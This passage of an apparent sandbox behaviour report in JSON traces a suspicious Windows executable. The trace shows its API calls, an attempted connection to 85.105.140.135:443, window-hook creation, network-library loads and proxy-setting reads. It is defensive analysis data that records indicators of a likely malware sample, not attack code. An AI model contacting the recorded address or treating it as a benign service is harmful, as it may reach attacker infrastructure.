22:35:52,094", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c4" + } + ], + "repeated": 0, + "id": 2571 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7334bc31", + "parentcaller": "0x733a0964", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 20, + "id": 2572 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7332ed40", + "parentcaller": "0x7332e70d", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "85.105.140.135" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 2573 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x000004f0", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 2574 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2575 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x00\\xe8\\xfbp\\x00" + } + ], + "repeated": 0, + "id": 2576 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 2577 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc4#\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2578 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2579 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3k\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2580 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3k\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2581 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 2582 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "8196", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "85.105.140.135" + }, + { + "name": "port", + "value": "443" + } + ], + "repeated": 0, + "id": 2583 + } + ], + "threads": [ + "9440", + "5984", + "6332", + "8196", + "1956", + "8036", + "10108", + "10104", + "10100" + ], + "environ": { + "UserName": "admin", + "ComputerName": "DESKTOP-JNJQ8PL", + "WindowsPath": "C:\\Windows", + "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", + "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe\" ", + "RegisteredOwner": "", + "RegisteredOrganization": "", + "ProductName": "", + "SystemVolumeSerialNumber": "2072-7ec1", + "SystemVolumeGUID": "79cd4c3b-0000-0000-0000-300300000000", + "MachineGUID": "", + "MainExeBase": "0x00400000", + "MainExeSize": "0x000cd000", + "Bitness": "32-bit" + }, + "file_activities": { + "read_files": [], + "write_files": [], + "delete_files": [] + } + } + ], + "anomaly": [], + "processtree": [ + { + "name": "3937597df70645ac297e.exe", + "pid": 9436, + "parent_id": 4864, + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "children": [], + "threads": [ + "9440", + "5984", + "6332", + "8196", + "1956", + "8036", + "10108", + "10104", + "10100" + ], + "environ": { + "UserName": "admin", + "ComputerName": "DESKTOP-JNJQ8PL", + "WindowsPath": "C:\\Windows", + "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", + "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe\" ", + "RegisteredOwner": "", + "RegisteredOrganization": "", + "ProductName": "", + "SystemVolumeSerialNumber": "2072-7ec1", + "SystemVolumeGUID": "79cd4c3b-0000-0000-0000-300300000000", + "MachineGUID": "", + "MainExeBase": "0x00400000", + "MainExeSize": "0x000cd000", + "Bitness": "32-bit" + } + } + ], + "summary": { + "files": [ + "C:\\Windows\\System32\\msctf.dll", + "C:\\Windows\\System32\\uxtheme.dll.Config", + "C:\\Windows\\System32\\uxtheme.dll", + "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe.Local\\", + "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984", + "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\\comctl32.dll", + "C:\\Windows\\WindowsShell.Manifest", + "C:\\Windows\\System32\\windows.storage.dll", + "C:\\Users\\pacop\\AppData\\Local\\Temp\\Wldp.dll", + "C:\\Windows\\System32\\wldp.dll", + "C:\\Windows\\System32\\*", + "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls", + "C:\\Users\\pacop\\AppData\\Local\\Temp\\CRYPTSP.dll", + "C:\\Windows\\System32\\cryptsp.dll", + "C:\\", + "C:\\Users\\pacop\\AppData\\Local\\Temp\\IPHLPAPI.DLL", + "C:\\Windows\\System32\\IPHLPAPI.DLL", + "C:\\Windows\\System32\\winnsi.dll", + "C:\\Windows\\System32\\nsi.dll", + "\\??\\Nsi", + "C:\\Windows\\System32\\mswsock.dll", + "C:\\Windows\\System32\\es-ES\\mswsock.dll.mui", + "C:\\Windows\\sysnative\\es-ES\\mswsock.dll.mui", + "C:\\Windows\\System32\\wshqos.dll", + "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui", + "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + ], + "read_files": [], + "write_files": [], + "delete_files": [], + "keys": [ + "HKEY_CURRENT_USER", + "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", + "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network", + "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32", + "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", + "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots", + "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", + "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", + "HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MigrateProxy", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoDetect", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttp", + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttpLowerCaseHost", + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + ], + "read_keys": [ + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", + "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MigrateProxy", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", + "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoDetect", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttpLowerCaseHost" + ], + "write_keys": [], + "delete_keys": [], + "executed_commands": [], + "resolved_apis": [], + "mutexes": [ + "Local\\SM0:9436:168:WilStaging_02" + ], + "created_services": [], + "started_services": [] + }, + "enhanced": [ + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 1, + "data": { + "file": "KERNELBASE.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 2, + "data": { + "file": "LPK.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 3, + "data": { + "file": "KERNEL32", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 4, + "data": { + "file": "imm32.dll", + "pathtofile": null, + "moduleaddress": "0x74eb0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 5, + "data": { + "file": "kernel32.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 6, + "data": { + "file": "kernel32.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 7, + "data": { + "file": "KERNEL32", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 8, + "data": { + "file": "user32", + "pathtofile": null, + "moduleaddress": "0x76b60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 9, + "data": { + "file": "C:\\Windows\\System32\\uxtheme.dll", + "pathtofile": null, + "moduleaddress": "0x73d00000" + } + }, + { + "event": "create", + "object": "windowshook", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 10, + "data": { + "id": "18446744073709551615", + "moduleaddress": "0x00000000", + "procedureaddress": "0x004352fc", + "module": "" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 11, + "data": { + "file": "user32.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "create", + "object": "windowshook", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 12, + "data": { + "id": "5", + "moduleaddress": "0x00000000", + "procedureaddress": "0x00432c2f", + "module": "" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 13, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,969", + "eid": 14, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": "0x73e60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 15, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 16, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": "0x73e60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 17, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 18, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": "0x73e60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 19, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 20, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": "0x73e60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 21, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 22, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": "0x73e60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 23, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:07,985", + "eid": 24, + "data": { + "file": "COMCTL32.DLL", + "pathtofile": null, + "moduleaddress": "0x73e60000" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 25, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 26, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 27, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 28, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 29, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 30, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,000", + "eid": 31, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,016", + "eid": 32, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,016", + "eid": 33, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,016", + "eid": 34, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,016", + "eid": 35, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,032", + "eid": 36, + "data": { + "file": "LPK", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,032", + "eid": 37, + "data": { + "file": "GDI32", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,032", + "eid": 38, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 39, + "data": { + "file": "NTDLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 40, + "data": { + "file": "advapi32.dll", + "pathtofile": null, + "moduleaddress": "0x762a0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 41, + "data": { + "file": "crypt32.dll", + "pathtofile": null, + "moduleaddress": "0x767c0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 42, + "data": { + "file": "shell32.dll", + "pathtofile": null, + "moduleaddress": "0x75950000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 43, + "data": { + "file": "shlwapi.dll", + "pathtofile": null, + "moduleaddress": "0x754e0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 44, + "data": { + "file": "urlmon.dll", + "pathtofile": null, + "moduleaddress": "0x73710000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,579", + "eid": 45, + "data": { + "file": "userenv.dll", + "pathtofile": null, + "moduleaddress": "0x73e10000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,594", + "eid": 46, + "data": { + "file": "wininet.dll", + "pathtofile": null, + "moduleaddress": "0x73080000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,594", + "eid": 47, + "data": { + "file": "wtsapi32.dll", + "pathtofile": null, + "moduleaddress": "0x745e0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,594", + "eid": 48, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,594", + "eid": 49, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,594", + "eid": 50, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,625", + "eid": 51, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,625", + "eid": 52, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,625", + "eid": 53, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,625", + "eid": 54, + "data": { + "file": "api-ms-win-eventing-provider-l1-1-0.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,625", + "eid": 55, + "data": { + "file": "api-ms-win-core-synch-l1-2-0.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,625", + "eid": 56, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,641", + "eid": 57, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", + "content": "kernel32.dll" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,641", + "eid": 58, + "data": { + "file": "kernel32.dll", + "pathtofile": null, + "moduleaddress": "0x760f0000" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,641", + "eid": 59, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:08,641", + "eid": 60, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", + "content": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,860", + "eid": 61, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,860", + "eid": 62, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,860", + "eid": 63, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,860", + "eid": 64, + "data": { + "file": "C:\\Windows\\System32\\rsaenh.dll", + "pathtofile": null, + "moduleaddress": "0x73aa0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:08,860", + "eid": 65, + "data": { + "file": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pathtofile": null, + "moduleaddress": "0x76090000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 66, + "data": { + "file": "user32.dll", + "pathtofile": null, + "moduleaddress": "0x76b60000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 67, + "data": { + "file": "ondemandconnroutehelper.dll", + "pathtofile": null, + "moduleaddress": "0x73d80000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 68, + "data": { + "file": "winhttp.dll", + "pathtofile": null, + "moduleaddress": "0x739d0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 69, + "data": { + "file": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pathtofile": null, + "moduleaddress": "0x73d80000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 70, + "data": { + "file": "winhttp.dll", + "pathtofile": null, + "moduleaddress": "0x739d0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 71, + "data": { + "file": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pathtofile": null, + "moduleaddress": "0x73d80000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 72, + "data": { + "file": "winhttp.dll", + "pathtofile": null, + "moduleaddress": "0x739d0000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 73, + "data": { + "file": "C:\\Windows\\System32\\mswsock.dll", + 